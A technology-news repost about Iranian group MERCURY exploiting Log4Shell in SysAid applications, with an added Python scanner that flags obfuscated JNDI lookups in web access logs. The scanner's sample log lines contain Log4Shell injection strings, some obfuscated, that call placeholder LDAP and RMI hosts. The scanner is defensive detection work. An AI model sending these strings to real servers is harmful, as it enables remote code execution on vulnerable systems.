• Hackers are still abusing Log4j deployments, Microsoft warns

    From TechnologyDaily@1337:1/100 to All on Fri Aug 26 13:30:04 2022
    Hackers are still abusing Log4j deployments, Microsoft warns

    Date:
    Fri, 26 Aug 2022 12:13:40 +0000

    Description:
    Iranian state-sponsored actors are targeting Israeli firms using Log4Shell flaws, Microsoft says.

    FULL STORY ======================================================================

    Log4Shell (CVE-2021-44228), one of the largest and potentially most devastating
    vulnerabilities ever discovered, is still being leveraged by threat actors more than half a year after it was first observed and patched.

    A new report from the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Research Team says the threat actor known as MERCURY (also tracked as MuddyWater) has been leveraging Log4Shell against organizations located in Israel. MERCURY is assessed to be a state-sponsored threat actor from Iran, operating under the direct command of the Iranian Ministry of Intelligence and Security.

    The attackers exploited the flaw in SysAid applications, which is a relatively novel approach, the teams said: "While MERCURY has used Log4j 2 exploits in
    the past, such as on vulnerable VMware apps, we have not seen this actor
    using SysAid apps as a vector for initial access until now."

    Establishing persistence, stealing data

    The group uses Log4Shell to gain access to target endpoints and drop web shells that let it execute several commands. Most of these are for reconnaissance, but one downloads further hacking tools.
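    A check a defender could run over web access logs for the initial-access step described above. This is an added example written for this page, not code from Microsoft, SysAid or the article. It URL-decodes each line and collapses Log4j 2 nested lookups (the "${${lower:j}ndi:...}" and "${::-j}${::-n}..." obfuscations) before matching, because a plain search for "${jndi:" misses those variants. The sample log lines, IP addresses and request paths are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web access logs.

Added example for this page, not code from Microsoft, SysAid or the article.
The sample log lines below are constructed; IPs and paths are placeholders.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Innermost Log4j 2 lookup, e.g. "${lower:j}" or "${::-n}". Attackers nest these
# so the literal string "jndi" never appears in the raw request.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation a probe reads "${jndi:ldap:..." or "${jndi:rmi:...".
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Evaluate one inner lookup the way Log4j 2 does for the forms seen in
    obfuscated payloads: ':-' default values and the lower/upper lookups."""
    if ":-" in token:                      # "${::-j}" or "${env:NOPE:-j}" -> "j"
        return token.split(":-", 1)[1]
    name, sep, value = token.partition(":")
    if sep and name.lower() == "lower":    # "${lower:J}" -> "j"
        return value.lower()
    if sep and name.lower() == "upper":
        return value.upper()
    return "${" + token + "}"              # anything else is left untouched


def normalize(text: str) -> str:
    """URL-decode (handles double encoding) and collapse nested lookups until
    the string stops changing, so "${${lower:j}ndi:...}" becomes "${jndi:...}"."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            return text
        text = collapsed


def find_log4shell(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup found in one log line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
    return {
        "source": line.split(" ", 1)[0],   # client IP: first field of the combined log format
        "scheme": m.group(1).lower(),      # ldap, ldaps, rmi, dns, ...
        "payload": payload,
    }


def scan(lines) -> list:
    """Scan many lines; one finding per line that carries a probe."""
    return [f for f in (find_log4shell(l) for l in lines) if f]


# Constructed sample traffic (Apache combined format): a clean request, three
# probes of increasing obfuscation, and a benign line that merely mentions jndi.
SAMPLE_LOGS = [
    '203.0.113.5 - - [26/Aug/2022:10:01:02 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Aug/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 5120 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [26/Aug/2022:10:02:33 +0000] "GET /login?next=%24%7B%24%7Blower%3Aj%7Dndi'
    '%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [26/Aug/2022:10:02:41 +0000] "POST /login HTTP/1.1" 302 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://198.51.100.7:1099/c}"',
    '198.51.100.20 - - [26/Aug/2022:10:03:00 +0000] "GET /docs?q=jndi+lookup HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f'{hit["source"]:<14} {hit["scheme"]:<5} {hit["payload"]}')
```

    Run it against real access logs line by line; the "source" field of each finding is the address to feed into the kind of inbound block Microsoft recommends, and the "scheme" tells you whether the callback was LDAP, RMI or a DNS-only probe. Matching on the raw request rather than the normalised form would miss the third and fourth sample lines.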

    After using Log4Shell to gain access to target endpoints, MERCURY
    establishes persistence, dumps credentials, and moves laterally across the target network, Microsoft says.

    It adds a new admin account to the compromised system and places its tooling in startup folders and ASEP (autostart extensibility point) registry keys, so that it survives a reboot.

    To mitigate the threat from MERCURY, Microsoft recommends a number of security measures, starting with checking whether the organization uses SysAid and applying security patches and updates where available.

    Organizations should also block inbound traffic from the IP addresses listed
    in the indicators-of-compromise table in Microsoft's report. All authentication activity for remote-access infrastructure should be reviewed, with IT teams focusing on accounts configured for single-factor authentication. Finally, multi-factor authentication (MFA) should be enabled wherever possible.



    ======================================================================
    Link to news story: https://www.techradar.com/news/hackers-are-still-abusing-log4j-deployments-microsoft-warns/


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)